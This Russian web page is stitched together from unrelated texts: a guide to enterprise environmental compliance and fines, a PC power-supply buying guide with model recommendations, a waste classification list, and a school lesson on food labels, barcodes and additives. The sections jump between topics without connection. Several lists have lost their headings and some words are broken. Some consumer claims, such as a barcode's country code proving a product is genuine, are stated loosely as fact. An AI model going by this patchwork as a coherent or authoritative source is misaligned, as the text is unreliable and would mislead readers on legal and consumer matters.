9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Что нужно сделать по экологии на предприятии

Что нужно сделать по экологии на предприятии

Что нужно сделать по экологии на предприятии

Чтобы выполнить природоохранные требования, предприятие:

  • получает разрешение – для предприятий с выбросами в окружающую среду (ч. 4 ст. 23 Закона от 10.01.2002 № 7-ФЗ);
  • ставит объекты с негативным воздействием на окружающую среду на государственный учет (п. 3 ст. 11 Закона от 21.07.2014 № 219-ФЗ);
  • составляет паспорт на отходы I–IV классов опасности (ст. 14 Закона от 24.06.1998 № 89-ФЗ);
  • получает лицензию – для предприятий, которые собирают, транспортируют, перерабатывают, утилизируют, обеззараживают и хранят отходы I–IV классов опасности (п. 30 ч. 1 ст. 12 Закона от 04.05.2011 № 99-ФЗ);
  • рассчитывает и перечисляет плату за загрязнение окружающей среды;
  • отчитывается в Росприроднадзор;
  • обучает руководителя и ответственного за экологическую безопасность (ст. 73 Закона от 10.01.2002 № 7-ФЗ);
  • разрабатывает программу экологического контроля и экологическую документацию.

За нарушение правил экологической безопасности Росприроднадзор привлечет ответственных должностных лиц и организацию к административной ответственности (ст. 23.29 КоАП).

Как оформить разрешительную документацию

До начала хозяйственной деятельности руководитель предприятия или иное лицо, в чьи должностные обязанности входит обеспечение вопросов экологической безопасности, должны определить перечень видов негативного воздействия на окружающую среду (НВОС).

  • выбросы загрязняющих и иных веществ в атмосферный воздух;
  • сбросы загрязняющих и иных веществ в водный объект;
  • размещение отходов производства и потребления.

Для оказания каждого вида негативного воздействия на окружающую среду хозяйствующий субъект должен иметь специальное разрешение (п. 4 ст. 23 Закона от 10.01.2002 № 7-ФЗ «Об охране окружающей среды»).

Соответствующие разрешительные документы называются:

  • разрешение на выброс вредных (загрязняющих) веществ (за исключением радиоактивных веществ) в атмосферный воздух (Административный регламент, утв. приказом Минприроды от 25.07.2011 № 650);
  • разрешение на сбросы веществ (за исключением радиоактивных веществ) и микроорганизмов в водные объекты (Административный регламент, утв. приказом Минприроды от 09.01.2013 № 2);
  • документ об утверждении нормативов образования отходов и лимитов на их размещение (приказ Минприроды от 25.02.2010 № 50).

Отсутствие необходимых документов при фактическом оказании перечисленных видов негативного воздействия на окружающую среду является основанием для привлечения к административной ответственности:

  • по части 1 статьи 8.21 КоАП за выбросы в атмосферный воздух – максимальный размер административного штрафа для юридического лица составляет 250 000 руб. или административное приостановление деятельности на срок до 90 дней;
  • части 4 статьи 8.13 КоАП за сбросы в водный объект или части 1 статьи 8.14 КоАП – максимальные размеры административного штрафа для юридического лица составляют соответственно 40 000 руб. и 100 000 руб. (по ч. 1 ст. 8.14 КоАП возможно административное приостановление деятельности на срок до 90 дней);
  • статье 8.2 КоАП за размещение отходов – максимальный размер административного штрафа для юридического лица составляет 250 000 руб. или административное приостановление деятельности на срок до 90 дней.

Если организация оказывает негативное воздействие на окружающую среду и не имеет разрешения, то она обязана возместить вред, причиненный окружающей среде, как в добровольном (как правило, по требованию органа государственного экологического надзора), так и в судебном порядке.

Как поставить объект на государственный учет

С 1 января 2015 года юридические лица или индивидуальные предприниматели, которые эксплуатируют любой объект НВОС, обязаны поставить его на государственный учет (п. 1 ст. 69.2 Закона «Об охране окружающей среды»).

При постановке на учет присваивают каждому объекту одну из четырех категорий, от которых зависит количество и характер требований к объекту в области охраны окружающей среды. Например, объекты IV категории освобождены от основных природоохранных обязанностей. На эти объекты не требуется оформлять разрешительную документацию, представлять отчетность, вносить платежи за НВОС, и на этих объектах не проводят плановые проверки в рамках экологического надзора.

Порядок постановки объекта на государственный учет зависит от момента ввода в эксплуатацию и определяется с учетом следующих особенностей:

  • в отношении объектов, которые ввели в эксплуатацию после 1 января 2015 года, – в течение шести месяцев с момента введения в эксплуатацию;
  • объектов, эксплуатация которых началась до 1 января 2015 года, – до 1 января 2017 года.

СИТУАЦИЯ

Нужно ставить на учет организацию, у которой единственный вид отходов – бытовой и офисный мусор

Росприроднадзор регистрирует организации, у которых есть объекты негативного воздействия на окружающую среду (ст. 4.2 Закона от 10.01.2002 № 7-ФЗ). Деятельность, в результате которой образуется бытовой и офисный мусор, нельзя считать основанием для постановки на учет в Росприроднадзоре.

Как организовать экологическую службу

Российское законодательство не содержит положений, которые прямо устанавливают обязанность организовывать экологическую службу как структурную единицу предприятия. Закон «Об охране окружающей среды» содержит лишь косвенное упоминание о необходимости организации структурного подразделения предприятия, которое фактически выполняет функции экологической службы (п. 3 ст. 67 Закона «Об охране окружающей среды»). Кроме того, необходимо представлять в орган государственного экологического надзора сведения об организации экологической службы и лицах, ответственных за осуществление производственного экологического контроля (п. 3 ст. 25 Закона от 04.05.1999 № 96-ФЗ «Об охране атмосферного воздуха»).

Если на предприятии экологическая служба организована в качестве отдельного подразделения, то она включает специалистов организации, в должностные обязанности которых входят вопросы охраны окружающей среды и рационального природопользования. При этом экологическая служба может именоваться отделом, департаментом, управлением и т. д.

Если отдельная служба не создана, то можно выбрать один из двух вариантов определения лиц, ответственных за соблюдение природоохранного законодательства:

  • назначение лиц, входящих в состав службы охраны труда, с обязанностями в области обеспечения экологической безопасности. В этом случае служба охраны труда именуется службой охраны труда, промышленной безопасности и экологической безопасности (охраны окружающей среды);
  • наем лиц, ответственных за соблюдение требований в области охраны окружающей среды, на условиях аутсорсинга. При этом целесообразно назначить должностное лицо, ответственное за вопросы охраны окружающей среды.

Какие требования к экологу

За экологию на предприятии отвечает руководитель, либо он возлагает ответственность на специального работника с высшим образованием – эколога (инженера по охране окружающей среды).

Квалификационные требования к специалисту по экологической безопасности (в промышленности) установлены приказом Минтруда от 31.10.2016 № 591н.

Предусмотрено два вида обязательной подготовки в области охраны окружающей среды для отдельных категорий специалистов и работников, занятых на объекте, оказывающем НВОС:

  1. подготовка в области экологической безопасности (ст. 73 Закона «Об охране окружающей среды»);
  2. профессиональная подготовка в области обращения с отходами I–IV классов опасности (ст. 15 Закона от 10.06.1998 № 89-ФЗ «Об отходах производства и потребления»). Подготовка проводится в соответствии с приказом МПР от 18.12.2002 № 868 «Об организации профессиональной подготовки на право работы с опасными отходами» с выдачей сертификата (свидетельства) на право обращения с отходами I–IV классов опасности.

Пройти оба вида подготовки можно в форме дополнительного профессионального образования по программам повышения квалификации в Учебном центре «Строитель».

Если лица, ответственные за экологическую безопасность, и лица, допущенные к обращению с отходами, не обучены, то предприятие несет административную ответственность в соответствии со статьями 8.1, 8.2 КоАП.

  • контролирует соблюдение природоохранных требований;
  • участвует в обучении работников;
  • разрабатывает проекты планов мероприятий по охране окружающей среды и контролирует их выполнение;
  • участвует в экологической экспертизе;
  • участвует в работах по очистке вод, предотвращению загрязнений, выбросов, уменьшению технологических отходов и т. д.;
  • следит за соблюдением правил охраны природы и состоянием окружающей среды в районе предприятия;
  • участвует в расчете экологических платежей;
  • составляет техническую документацию;
  • участвует в проверке соответствия оборудования природоохранным требованиям;
  • составляет экологическую отчетность.

Такие правила следуют из части 1 статьи 73 Закона от 10.01.2002 № 7-ФЗ, части 1 статьи 15 Закона от 24.06.1998 № 89-ФЗ, Квалификационного справочника, утвержденного постановлением Минтруда от 21.08.1998 № 37.

Кому и как составить паспорт отходов

На отходы I–IV классов опасности паспорт нужно составить всем предприятиям. На отходы V класса опасности составление паспорта отхода не обязательно. Нужно лишь наличие подтверждения класса опасности, которое выдают по результатам лабораторного биотестирования (п. 4 постановления Правительства от 16.08.2013 № 712).

На каждый конкретный вид отходов заполните индивидуальную форму, которая приведена в постановлении Правительства от 16.08.2013 № 712.

Паспорт отходов I–IV классов опасности составьте на основании данных о составе и свойствах этих отходов, а также оценки их опасности в зависимости от степени негативного воздействия на окружающую среду (п. 3 постановления Правительства от 16.08.2013 № 712). В случае образования отходов из продукции, утратившей свои потребительские свойства, сведения возьмите из компонентного состава исходника.

В форме паспорта отразите технологический процесс, в ходе которого образовался отход, или процесс утраты продукцией своих потребительских свойств. Укажите рекомендуемый способ переработки отходов, необходимые предосторожности при обращении с данными отходами и возможные ограничения.

Паспорт действует бессрочно (п. 8 постановления Правительства от 16.08.2013 № 712).

ВНИМАНИЕ

Наличие паспорта отхода не освобождает организацию или индивидуального предпринимателя от разработки лимитов на размещение отходов (ПНООЛР).

Заверенные предприятием копии паспортов отходов, а также копии документов, которые подтверждают отнесение вида отхода к конкретному классу опасности, направьте в территориальный орган Росприроднадзора по месту осуществления хозяйственной деятельности. Документы отправьте любым способом, позволяющим определить факт и дату их получения, или вручите их под подпись (п. 7 постановления Правительства от 16.08.2013 № 712).

СИТУАЦИЯ

Как определить класс опасности отходов

Класс опасности отходов определите по Федеральному классификационному каталогу отходов (ФККО), который введен в действие приказом Росприроднадзора от 22.05.2017 № 242, или с помощью расчетно-экспериментального метода, в случае если отход не включен в классификатор.

  • отходы I класса: чрезвычайно опасные, например ртуть, лампы люминесцентные;
  • тходы II класса: высокоопасные, например отходы серной кислоты, синтетических масел, опилки свинцовые;
  • отходы III класса: умеренно опасные, например пыль цинкосодержащая, шлак плавки меди, смазочно-охлаждающие масла;
  • отходы IV класса: малоопасные, например пыль древесная, бой стекла;
  • отходы V класса: практически неопасные, например солома, зерноотходы.

СИТУАЦИЯ

Как вывозить опасные отходы

Вывозить опасные отходы может как сама организация, так и подрядная лицензированная организация по договору.

Чтобы самостоятельно вывозить отходы, предприятию нужны:

  • лицензия;
  • паспорт отходов;
  • транспортные средства, которые снабжены специальными знаками;
  • документация для транспортирования и передачи отходов, в которой указано количество транспортируемых отходов, цель и место назначения их транспортирования.

Такие правила указаны в статье 16 Закона от 24.06.1998 № 89-ФЗ и пункте 30 статьи 12 Закона от 04.05.2011 № 99-ФЗ.

Если отходы не утилизировать, предприятие могут оштрафовать от 100 000 до 250 000 руб. либо приостановить деятельность до 90 суток (ст. 8.2 КоАП).

СИТУАЦИЯ

Нужно ли заключать договор на утилизацию ртутьсодержащих отходов, если фактически за прошедший год такие отходы не образовывались. На предприятии эксплуатируют ртутьсодержащие лампы

Потребители ртутьсодержащих ламп осуществляют накопление отработанных ртутьсодержащих ламп в соответствии с постановлением Правительства от 03.09.2010 № 681. Если за отчетный период движения отходов не произошло, целесообразно это отразить в журнале, сделав соответствующую запись по итогам отчетного периода. Выход лампы из строя может произойти в любой момент, поэтому потребители таких ламп обязаны своевременно сдать ее на утилизацию в специализированную организацию согласно пункту 9 Правил, утвержденных постановлением Правительства от 03.09.2010 № 681.

Требования к блоку питания

Приобретая блок питания, будь то: зарядное устройство, стабилизатор напряжения для персонального компьютера, ноутбука и мобильного телефона, покупатель должен быть уверен в том, что электроприбор не спровоцирует:

  • выход из строя техники;
  • перепады напряжения;
  • возгорание;
  • отключения электроэнергии.

Товар, не соответствующий этим простым и логичным требованиям, изымается из оборота и приводит к судебным разбирательствам и штрафам порядка 500 000 рублей.

Стандарты блоков питания для ПК

По общепринятому определению, компьютерный блок питания – это силовой компонент системы, обеспечивающий питанием остальные элементы ПК. С точки зрения схемотехники, БП представляет собой модуль для преобразования переменного тока силовой сети 100-127В (США, Японии и на Тайване, а также местами в Южной Америке) или 220-240В (Европа и большинство других стран мира) в постоянный ток с уровнями напряжения, приемлемыми для питания компонентов компьютера.

Блок питания – лишь один из компонентов компьютерной системы, поэтому его ключевые характеристики определяются в качестве одной из многочисленных рекомендаций к системам определённого форм-фактора, а не наоборот. Например, именно стандартный форм-фактор ATX (Advanced Technology Extended), разработанный Intel в 1995 году, определяет габариты и другие характеристики блока питания, а не БП определяет форму систем ATX.

Изначально блоки питания, рассчитанные для работы в настольных компьютерных системах, в большинстве своём рассчитывались согласно требованиям стандарта ATX12V. Так было до версии стандарта ATX12V 2.2 (выпущена в марте 2005), после чего было принято решение объединить в едином документе требования по всем общепринятым форм-факторам настольных платформ, включая CFX12V, LFX12V, ATX12V, SFX12V и TFX12V. Со временем появился документ «Design Guide for Desktop Platform Form Factors, Revision 1.1» (март 2007), актуальный и по сей день.

Для справки: форм-факторы компьютеров определяются, главным образом, форматом системных плат, размеры некоторых из них приведены ниже в миллиметрах:

  • WTX — 356х425
  • AT – 350х305
  • Baby-AT – 330х216
  • BTX- 325х266
  • ATX- 305х244
  • LPX – 330х229
  • microBTX – 264х267
  • microATX — 244х244
  • microATX (минимум) – 171х171
  • FlexATX – 229х191
  • Mini-ITX – 170х170
  • Nano-ITX – 120х120
  • Pico-ITX – 100х72
  • PC/104 (-Plus) – 96х90
  • mobile-ITX – 60х60

Таким образом, если вы увидите в спецификациях блока питания упоминание о «соответствии стандарту ATX12V 2.3», имейте в виду, что такого документа в природе не существует. Последним, отдельно представленным документом был ATX12V 2.2, а маркировка версии «2.3» означает соответствие требованиям подпункта «ATX12V Specific Guidelines 2.3» в выше упомянутом документе руководства по дизайну настольных платформ, версии 1.1, общем для всех настольных форм-факторов.

Несмотря на то, что ATX12V является лишь подмножеством среди других форм-факторов ПК, говоря о настольных системах, мы обычно подразумеваем именно этот стандарт. Если, конечно, не идёт речь о миниатюрных «примочках к телевизору» для просмотра видео, компактных офисных машинках, серверных системах и прочих особых случаях, не вписывающихся в определение домашней или игровой настольной системы. Сегодня речь идёт именно о блоках питания ATX12V.

Также следует отметить, что публикация новых стандартов по блокам питания не отменяет предыдущие рекомендации и требования, а, как правило, лишь ужесточает их. Поэтому, сегодня мы изучим стандарт ATX12V 2.2, и в дополнение к нему дополнения «ATX12V Specific Guidelines 2.3» из документа «Design Guide for Desktop Platform Form Factors, Revision 1.1».

Требования этих документов можно назвать достаточными для выбора модели БП, подходящей для конструирования системы в целом, однако если говорить о конструировании именно современной системы, к обязательному рассмотрению необходимо принять ещё как минимум один документ – рекомендации 80PLUS.

Так или иначе, часть подводимой к ПК мощности рассеивается непосредственно самим блоком питания процессе его работы. Например, суммарное энергопотребление системы порядка 500 Вт и КПД блока питания уровня 75% на практике означают, что БП тратит на себя четверть потребляемой энергии. Около 125 Вт – а это мощность приличного паяльника, уходят у БП на «обогрев» самого себя! Если же БП обладает более высоким КПД – скажем, 87%, расходы на оплату электричества, равно как и охлаждение системы, можно значительно сократить.

Ещё один интересный пример. Допустим, вы запланировали купить блок питания «с запасом». Мало ли… Выбор пал на блок киловаттной мощности. Запас карман не тянет? Может быть, но не в случае с блоками питания. Представьте, как будет «вести» себя БП мощностью 1 кВт в системе, максимальная нагрузка которой даже на пике не превышает 500 Вт, от силы – 600 Вт. Редкая современная система – даже на 6-ядерном процессоре и паре мощнейших видеокарт, потребляет большую мощность.

Обычно блоки питания выходят на хороший показатель КПД при нагрузке от 40-50% и выше, оптимум – в районе 70-100% нагрузки. При меньшей загруженности коэффициент полезного действия обычно ниже. Посчитаем: киловаттник, да ещё и в случае, если он сертифицирован только по стандарту ATX12V, «обязан» показывать КПД при лёгкой загруженности на уровне 65-72%, то есть, нагрузив такой БП лишь 400-Вт нагрузкой, более четверти энергии будет затрачено на обогрев, а с учётом того, что большинство производительных настольных систем потребляют при нормальной нагрузке не более 250-350 Вт, потери могут достигать трети всей потребляемой энергии.

Вот почему к рекомендациям 80PLUS не стоит относиться пренебрежительно, как и в целом, к выбору блока питания не стоит подходить по остаточному принципу.

Как выбрать блок питания для своего компьютера?

Большинство людей в процессе сборки нового компьютера уделяют повышенное внимание процессору и видеокарте, а другие элементы подбирают по принципу «как придется».

Бюджетная материнская плата, дешевый жесткий диск, блок питания от непонятного производителя — как итог, вроде бы достойная конфигурация, которая сбоит, тормозит и всячески мешает пользователю насладиться покупкой.

Чтобы подобных проблем с вами не случилось, нужно пройти небольшую теоретическую подготовку.

Что требуется от блока питания?

Индустриальные стандарты предъявляют достаточно мягкие требования к характеристикам компьютерных блоков питания.

Напряжения не должны отклоняться более чем на 5% от номинального значения, кратковременные пульсации напряжений не должны превышать 120 мВ для напряжения 12 В и 50 мВ для остальных напряжений, а КПД на полной нагрузке не должен быть ниже 70%.

Тем не менее, не все блоки питания, которые вы можете увидеть на прилавках, укладываются в данные параметры: большинство источников питания от бюджетных производителей умудряются нарушить хотя бы одно из этих ограничений.

Блоки питания от более респектабельных поставщиков, как правило, не имеют проблем ни с базовыми характеристиками, требуемыми стандартом, ни с дополнительными улучшениями эффективности (как правило, подтверждаемыми сертификацией по одному из вариантов стандарта 80 PLUS).

За что идет переплата при равной мощности?

Если вы видите на прилавке два блока питания мощностью 600 Вт, один из которых стоит 1800 рублей, а другой — 3500 рублей, не нужно думать, что доплата идет только за бренд или еще какие эфемерные навороты вроде модной окраски корпуса или подсветки вентилятора. Более дорогая модель наверняка окажется эффективнее, тише при работе и обеспечит лучшее качество компонентов. За счет более сложной (и, соответственно, дорогой) начинки, более дорогой блок обеспечивает более высокий КПД и лучшую стабильность выходных напряжений. Если в бюджетных источниках питания стабилизация напряжений групповая, что приводит к заметным отклонениям при изменении нагрузки, то в более дорогих блоках для каждого из напряжений она индивидуальна.

Более высокая эффективность, в свою очередь, позволяет понизить скорость вращения вентилятора охлаждения: практически все современные блоки питания средней и высокой ценовых категорий почти бесшумны на малых и средних нагрузках.

Требования к мощности

Возможно, кому-то это покажется невероятным, но блоки питания мощностью в киловатт и более нужны лишь в единичных случаях особо мощных конфигураций с несколькими мощными видеокартами и серьезным разгоном.

Типичная игровая система средней производительности (процессор и видеокарта из средних по цене и мощности семейств, пара накопителей) вполне способна питаться от блока питания на 400 Вт.

Мощной игровой системе с флагманской одночиповой видеокартой и процессором старшего семейства вполне достаточно источника питания на 450-500 Вт мощности.

Системе с парой топовых видеокарт (или двухчиповым флагманским решением) и самым мощным серийным процессором в реальной работе хватит 600 Вт.

Лишь для более мощных конфигураций, количество которых у пользователей близко к статистической погрешности (или же в случае серьезного разгона), требуется большая мощность.

Впрочем, некоторый запас мощности не повредит (со временем БП несколько теряют в своих параметрах, да и апгрейдов никто не отменял), так что брать блок впритык к реально востребованной мощности не имеет особого смысла.

Ну и, наконец, не лишним будет напомнить, что эти значения приведены для «честной» мощности БП, которая далеко не всегда совпадает с надписями на этикетках дешевых моделей.

Производители

Какие компании ассоциируются с запросом «производитель блоков питания»?

Aerocool, Antec, Chieftec, Cooler Master, Corsair, Cougar, FSP, Seasonic, Thermaltake — список можно продолжать и продолжать.

Вот только из приведенного перечня наиболее распространенных на отечественном рынке блоков питания собственными разработками торгуют только FSP и Seasonic (плюс Cougar в качестве розничного бренда HEC/COMPUCASE).

Остальные же названные фирмы используют платформы, спроектированные сторонними разработчиками.

Помимо уже названных фирм, среди реальных производителей собственных платформ блоков питания можно отметить такие компании, как Andyson, Channel Well Tecnology, Enhance, Flextronics, Sirfa и ряд менее известных контрактных поставщиков.

У каждого из производителей есть более и менее удачные серии, но в целом наибольшим авторитетом и пользуются платформы CWT и Seasonic.

Продукты Andyson и Enhance порой вызывают претензии по некоторым параметрам.

Технические параметры

В этой области можно начинать «копать» с таблички с паспортными характеристиками, которая имеется у любого блока питания.

Необходимые (хоть и не всегда достаточные) критерии качественных блоков питания достаточно просты:

• общая заявленная мощность блока не должна быть больше суммы допустимых;

• нагрузок по различным напряжениям;

• мощность, передаваемая по напряжению 12 В, должна быть близка к максимальной мощности блока (даже очень мощные системы практически никогда не потребляют более 50 Вт от прочих напряжений даже при полной нагрузке);

• желательна сертификация по стандарту 80 PLUS, которая гарантирует определенную эффективность блока (мейнстримом сейчас можно считать блоки с сертификацией 80 PLUS Bronze).

Уже по несоответствию этим весьма скромным требованиям можно отсеять львиную долю блоков, предлагаемых в рознице по цене ниже 3000 рублей (приемлемые по характеристикам модели можно найти и среди недорогих источников питания, но тут уже надо знать, что искать).

Стоимость же удачных во всем комплексе характеристик моделей (высокая мощность, хорошие выходные параметры, достойная эффективность, невысокий шум при работе) начинается приблизительно с отметки 3500 рублей.

Конкретные рекомендации

Собирая систему не слишком высокой мощности, при отсутствии возможности переплачивать за блок питания, можно остановиться на таких моделях, как Chieftec GPA-500S,In Win PowerMan IP-S450HQ7-0 (часто поставляется в комплекте с корпусами In Win) или FSP ATX450N — эти модели мощностью 450-500 Вт можно купить по вполне доступной цене.

Они вряд ли порадуют акустическим комфортом под нагрузкой, КПД по современным меркам невысок, а кабели отличаются скромной длиной и бедным набором разъемов, но иных претензий к ним предъявить нельзя.

При возможности доплатить некоторую сумму, хорошо себя покажут модели Chieftec серий A80, A85 и A135 — они тише и эффективнее указанных выше моделей.

А оптимальным выбором по сочетанию цены и качества сейчас являются модели, основанные на относительно свежей платформе CWT PUQ (В).

К ним, в частности, относятся блоки питания Chieftec серии Nitro II 85+ и многие блоки Corsair (все модели серии GS, модели CX750 и CX750M, младшие модели серии TX).

Платформа CWT PUQ (В) отличается хорошей стабильностью всех напряжений, сертификацией по стандарту 80 PLUS Bronze (с солидным запасом по эффективности) и очень тихой работой на малых и средних нагрузках (блоки Corsair на этой платформе, за исключением моделей серии CX, и вовсе отключают вентилятор при малых нагрузках).

Что-то более навороченное стоит искать разве что в случаях помешанности на экономии энергии и экологии (блоки «золотого» или «платинового» стандарта 80 PLUS) либо при сборке особо мощных систем. Тут стоит обратить внимание на модели Corsair серии AX (платформа Seasonic, но ощутимо дешевле «родных» моделей этого разработчика и производителя) и AXi (платформа Flextronics с возможностью управления рядом параметров блока питания из-под ОС).

Виды мусора

На территории Российской Федерации действует кодификация, согласно которой все утильсырье разделяют на группы для дальнейшей безопасной утилизации. Согласно правовому документу, мусор сортируют по ряду признаков на различные категории.

По агрегатному состоянию:

  • газообразные;
  • жидкие;
  • твердые;
  • сыпучие;
  • гелеобразные;
  • смешанные.
  • органические;
  • химические;
  • минеральные;
  • коммунальные.

По возможности повторного применения:

  • перерабатываются во вторичное сырье;
  • возвратные – могут использоваться по другому назначению;
  • безвозвратные – подлежат уничтожению или захоронению.

Важно! При сортировке мусора в классификации отражаются все признаки, на основании этих данных выбирается соответствующая технология утилизации.

Экологическая безопасность и продукты питания

Материалы на столах учащихся

1. Бутылки с уксусной кислотой.
2. Банки из-под сгущенного молока, рыбных и мясных консервов.
3. Пластмассовые коробки из-под маргарина, йогурта.
4. Коробки из-под кукурузных палочек.
5. Жевательные резинки.
6. Шоколад.
7. Сок яблочный.
8. Банки из-под кофе, какао.
9. Детское питание.
10. Сухие соки.
11. Требования к оформлению практической работы.
12. Алгоритм выполнения практической работы.
13. Таблица кодов EAN (приложение №1).
14. Таблица кодов пищевых добавок (приложение №2).

Базовые знания

Продукты питания, сроки их хранения.

Возможности длительного хранения продуктов питания.

Экологическая характеристика производства продуктов питания.

Категории продовольственных товаров.

Информация на упаковке продовольственных товаров и требования к ней.

Пищевые добавки и красители, их экологическая характеристика.

Основные понятия и термины

– экологическая безопасность;
– консерванты;
– пищевые добавки;
– красители;
– штамп;
– штриховой код;
– знак соответствия российскому стандарту;
– ГОСТ;
– технические условия (ТУ);
– смачиватели;
– эмульгаторы.

Развиваемые умения и навыки

Анализ информации на упаковке продовольственных товаров.

Первичная экологическая экспертиза упакованных продовольственных товаров.

Самостоятельная оценка целесообразности использования продуктов питания.

Учитель. Проблема обеспечения населения продовольствием была и остается одной из важнейших в жизни большинства стран. Производство продуктов питания всегда было трудоемким, поэтому производители всячески стремятся к увеличению выпуска продукции при снижении ее себестоимости.
Способы повышения интенсивности производства продовольствия (удобрения; гербициды и ядохимикаты – для борьбы с вредителями и болезнями растений; белковые антибиотики – для увеличения производства продуктов животноводства и т.д.) снижают качество продуктов, а иногда приводят к появлению в них небезопасных для человека веществ.
Для увеличения сроков хранения скоропортящихся продовольственных товаров применяются различные технологии: консервирование, замораживание, пастеризация, высушивание и др., многие из которых предполагают использование специальных добавок, улучшающих внешний вид, вкусовые качества и способствующих увеличению срока хранения продукта. Это красители, подсластители, эмульгаторы, антиоксиданты, консерванты и т.п.
На мировом рынке существует три категории качества продовольственных товаров, различающиеся исходным сырьем и особенностями технологии производства.
В продовольственных товарах первой категории количество и типы спецдобавок строго регламентированы.
Качество второй категории контролируется менее строго. Они производятся с учетом требований страны-импортера. Так, например, наличие на упаковке знака РСТ означает соответствие российскому стандарту.
На товары третьей категории не распространяются многие ограничения на использование спецдобавок, себестоимость их гораздо ниже, а производство выгоднее. К этой категории относится до 80% продуктов питания, сигарет и напитков, поставляемых на мировой рынок.
Теперь послушаем сообщения учащихся, подготовленные на основе материалов периодической печати.

Сообщение 1. Сухие напитки, соки

Еще недавно сухие соки называли «очевидным фактором прогресса, необходимым в ассортименте продуктов». Однако в последнее время в торговую сеть поступает множество сухих напитков, лишь имитирующих натуральный высушенный экстракт фруктовых и овощных соков. Это продукты «иллюзорные»: их искусственные компоненты подобраны так, чтобы создавать иллюзию натурального сока. Важнейшую роль в них играют красители, подсластители и другие пищевые добавки. Так в «Зуко», «Юпи» и других напитках половина или 2/3 сахара заменены на искусственный подсластитель цикламат, а в американском «Инвайте» вместо сахара используются сахарин и аспартам. В США цикламат был официально запрещен еще в 1969 г., так как было доказано, что он, как сахарин и аспартам, вызывает у крыс рак мочевого пузыря. В 1979 г. всемирная организация здравоохранения реабилитировала цикламаты, признав их безвредными. В России использование всех этих подсластителей – сахарина (Е954), цикламата (Е952) и аспартама (Е951) – разрешено. Поэтому покупать или нет такие сухие напитки – дело потребителя.

Сообщение 2. Гадание на кофейной банке

В настоящее время на рынке можно найти много сортов настоящего растворимого кофе, однако встречаются его подделки. Это можно определить по некоторым признакам упаковки. Упаковка подделок обычно изготовлена из картона, легкой жести или полиэтилена, наклеенная бумажная этикетка имеет блеклые тона. На упаковке приведен минимум информации, в графе «Производитель» указано только название фирмы, а то и этого нет – лишь броская надпись «Сделано в. ». Цифры штрих-кода, как правило, взяты с потолка.
Настоящий же кофе обычно продается в металлических или стеклянных банках с яркой красочной этикеткой, на которой приведено много полезной информации: название марки, тип продукта (сублимированный, гранулированный кофе с удаленным кофеином и т.д.), фирма-изготовитель с указанием страны и адреса, штрих-код, дата выработки и срок реализации.

Сообщение 3. Эта загадочная «Рама»

Информация о свойствах этого продукта представлена на упаковке в «закодированном» виде. Сообщается, что в 70 г жира содержится «сложных жирных кислот 26 г, односоставных – 24 г, многосоставных – 20 г». Что это за кислоты – непонятно, т.к. таких терминов в химии нет. Существуют насыщенные кислоты, характерные для твердых жиров, мононенасыщенные (например, олеиновая), превалирующие в жидких растительных маслах, и полиненасыщенные – незаменимые кислоты, выполняющие в организме роль витаминов. Кроме того, изготовитель не указывает содержание соли и влаги в продукте. Вызывает сомнение и сроки годности – краска легко стирается, что недопустимо для подлинного продукта. Напрашивается вопрос: стоит ли после этого доверять «превосходному вкусу «Рамы»?

Учитель. Вы ознакомились с некоторыми данными о продуктах питания, которые можно найти в периодической печати. Давайте теперь обменяемся мнениями и сделаем выводы.

(После короткой дискуссии формулируется вывод: чем полнее сведения о продукте на его упаковке (этикетке) и чем меньше в них ошибок, тем больше шансов, что продукт подлинный, а не подделка.)

Согласно закону РФ «О защите прав потребителя» на упаковке (этикетке) пищевого продукта должна содержаться вполне определенная информация о свойствах продукта, причем на русском языке. Это наименование производителя и его адрес; наименование товара и его масса; состав, а при необходимости и химический состав; дата изготовления и срок годности или реализации; обозначение стандарта или ТУ; предупреждения об опасности и рекомендации по применению; наличие спецдобавок. Важно также, чтобы информация на упаковке (этикетке) соответствовала штриховому коду, а на консервной банке и штампу. По штампу также можно определить срок изготовления консервированного продукта. Послушаем теперь сообщения учащихся.

Сообщение 4. Штриховой код: как его расшифровать

В последнее время на прилавках магазинов появляется все больше товаров, снабженных штрих-кодом. Специалисты называют несколько причин его введения, но основной является то, что он позволяет легко контролировать качество продукции, ее соответствие первоначальному образцу.
Штрих-код – это ряд вертикальных черных и белых полос, под которыми расположено 13 цифр. Товары, имеющие небольшие размеры, могут иметь укороченный код – 8 цифр. Первые 2 цифры обозначают страну-изготовителя или продавца продукта, за ними следует 5 цифр кода предприятия-изготовителя. Следующие 5 цифр кодируют наименование товара, его потребительские свойства, размеры, массу, цвет. Последняя цифра – контрольная, используемая для проверки правильности считывания штрихов сканером. Используется также штрих-код, в котором стране соответствуют 3 цифры, а предприятию-изготовителю – 4.
В 1987 г. ассоциация EAN закрепила за СССР десять трехзначных кодов – с 460-го по 469-й. Если вам встретится товар, имеющий код 469 12510000 10, то перед вами десертный шоколад «Люкс» московской кондитерской фабрики «Красный Октябрь» массой 100 г. Рядовой покупатель, не вооруженный специальными справочниками, не в состоянии определить по одному только коду изготовителя товара. Впрочем, в этом нет большой необходимости. Главное – определить соответствие штрих-кода названию страны изготовителя, указанному на упаковке, – его наличие служит залогом того, что товар не фальсифицирован.

Сообщение 5. Штамп на консервной банке

Для продукции, изготовленной на территории России, предусмотрена единая маркировка металлических консервных банок. У некоторых из них на донышке выбито два ряда цифр, у других – три.
Трехрядная маркировка характерна для мясных, рыбных и овощных консервов. В первом ряду указана дата изготовления, во втором – номер смены. Третий ряд – тип консервов и номер предприятия: «Р» – рыбные, «Д КП», «ПС», «МС», «ОХ» – мясные.
Например, лососевая икра маркируется в 3 ряда: первый ряд – дата изготовления, второй – знак «Икра», третий – номер завода, номер смены и буква «Р» – индекс продукта рыбной промышленности.
Маркировка сгущенного молока – двухрядная. В первом ряду – буква «М» – индекс молочных продуктов, во втором ряду – номер смены (до трех цифр), месяц (2 цифры) и год изготовления (2 цифры).
Осетровая икра также имеет двухрядную маркировку. Первый ряд – декада (1 цифра), месяц и год (по 2 цифры) изготовления, второй ряд – номер мастера (1–2 цифры).
Штамп на консервной банке позволяет узнать дату изготовления, по которой легко определить срок реализации, указанный на упаковке (этикетке).

Учитель. В начале урока я рассказала вам о категориях продовольственных товаров на мировом рынке. Как правило на упаковках (этикетках) нет сведений о том к какой категории качества относится товар, но обычно указано, какие спецдобавки он содержит. Спецдобавки обозначены буквенно-цифровым кодом. Многие из добавок далеко не безопасны для здоровья.
